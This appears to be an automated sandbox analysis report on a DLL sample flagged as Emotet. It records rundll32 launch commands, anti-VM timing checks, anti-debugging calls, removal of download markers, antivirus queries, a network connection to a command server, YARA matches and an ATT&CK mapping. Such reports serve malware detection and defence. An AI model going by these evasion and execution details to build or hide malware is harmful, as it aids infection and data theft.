Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04043502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04042309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0404251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04046B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04045923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0406292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04043345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04061343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04043F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0404C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04051F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04054D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04044F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0404FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04061193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04059DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0404BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_040543B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04057BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04046FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_040625C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0404A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_040603F1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6EA85BE0 appears 40 times

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA713F0 zwxnlwalmcbgmt,

Source: yFAXc9z51V.dll

Binary or memory string: OriginalFilenameErulfuaekg.dll6 vs yFAXc9z51V.dll

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: yFAXc9z51V.dll	Virustotal: Detection: 24%
Source: yFAXc9z51V.dll	ReversingLabs: Detection: 22%

Source: yFAXc9z51V.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll"
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,abziuleoxsborpb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,aejkroaebsbxdnkhb
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr",vQmrKt
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Wlimfwutowthen\gdntcqg.ebr",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,abziuleoxsborpb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,aejkroaebsbxdnkhb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr",vQmrKt
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Wlimfwutowthen\gdntcqg.ebr",Control_RunDLL
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@37/8@0/20

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA83C90 CoCreateInstance,

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 19_2_04051B54 CreateToolhelp32Snapshot,

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,Control_RunDLL

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:3928:120:WilError_01

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA7EBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: yFAXc9z51V.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: yFAXc9z51V.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yFAXc9z51V.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yFAXc9z51V.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yFAXc9z51V.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yFAXc9z51V.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C51229 push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02D41229 push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA85C26 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EAA8067 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_02C31229 push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04221229 push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_04041229 push eax; retf

Source: yFAXc9z51V.dll

Static PE information: real checksum: 0x81586 should be: 0x823cc

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr:Zone.Identifier read attributes | delete

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA76672 second address: 000000006EA766A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F0DD8C6D1B1h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA78A23 second address: 000000006EA78A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F0DD8C41D7Eh 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA76672 second address: 000000006EA766A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F0DD8C6D1B1h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA78A23 second address: 000000006EA78A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F0DD8C41D7Eh 0x00000007 rdtscp

Source: C:\Windows\System32\svchost.exe TID: 2528

Thread sleep time: -150000s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA76620 rdtscp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 19_2_04051A80 FindFirstFileW,

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Source: svchost.exe, 00000000.00000002.807188737.000001FDAB602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000001F.00000002.574914431.000001D7FFEEA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001F.00000002.574914431.000001D7FFEEA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWS Platform Interface
Source: svchost.exe, 00000000.00000002.807319272.000001FDAB628000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.807831895.000001BFDBA68000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.807600872.0000024C81E29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA8ED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA8849D IsProcessorFeaturePresent,GetProcessHeap,HeapAlloc,InitializeSListHead,GetProcessHeap,HeapFree,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA76620 rdtscp

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C6DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02D5DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA76620 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA8849D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA76510 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA78A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA969AA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_02C4DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0423DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 19_2_0405DE10 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA8ED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA85ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA85239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1

Source: svchost.exe, 00000007.00000002.807952025.000001FF87860000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.809503666.0000000002C30000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000007.00000002.807952025.000001FF87860000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.809503666.0000000002C30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000007.00000002.807952025.000001FF87860000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.809503666.0000000002C30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000007.00000002.807952025.000001FF87860000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.809503666.0000000002C30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA85916 cpuid

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6EA85C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 00000011.00000002.807785872.000001D93E102000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.807633669.000001D93E040000.00000004.00000001.sdmp	Binary or memory string: $@V%ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2b14358.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.28d41f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2ad5298.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2974250.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2b14358.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.28d41f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.33c6390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2974250.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2ad5298.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.33c6390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.388952908.000000000295A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.414340731.00000000033AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.390623075.00000000028BA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.363481536.0000000002AFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.390502900.000000000097D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.365418732.0000000002ABA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.808384988.00000000026E7000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection112	Masquerading21	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery151	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery134	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yFAXc9z51V.dll	24%	Virustotal		Browse
yFAXc9z51V.dll	23%	ReversingLabs	Win32.Infostealer.Convagent

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.rundll32.exe.3250000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4220000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
1.2.loaddll32.exe.c50000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.2ad5298.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.2c30000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.2d40000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
